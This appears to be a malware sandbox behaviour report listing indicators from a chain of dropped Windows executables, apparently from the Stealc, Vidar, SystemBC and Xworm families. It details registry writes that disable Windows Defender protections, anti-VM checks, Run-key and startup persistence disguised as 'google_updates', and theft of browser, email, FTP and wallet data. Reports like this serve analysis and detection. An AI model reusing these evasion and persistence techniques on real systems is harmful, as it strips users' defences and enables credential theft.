Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor protector

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\Oar936gK\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c29c440560.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107370101\\c29c440560.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9bd1404279.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107380101\\9bd1404279.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4b886460ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107390101\\4b886460ab.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8809d7d07b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107400101\\8809d7d07b.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\BB8Z9QLVS663O4EQKUQWIVS.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
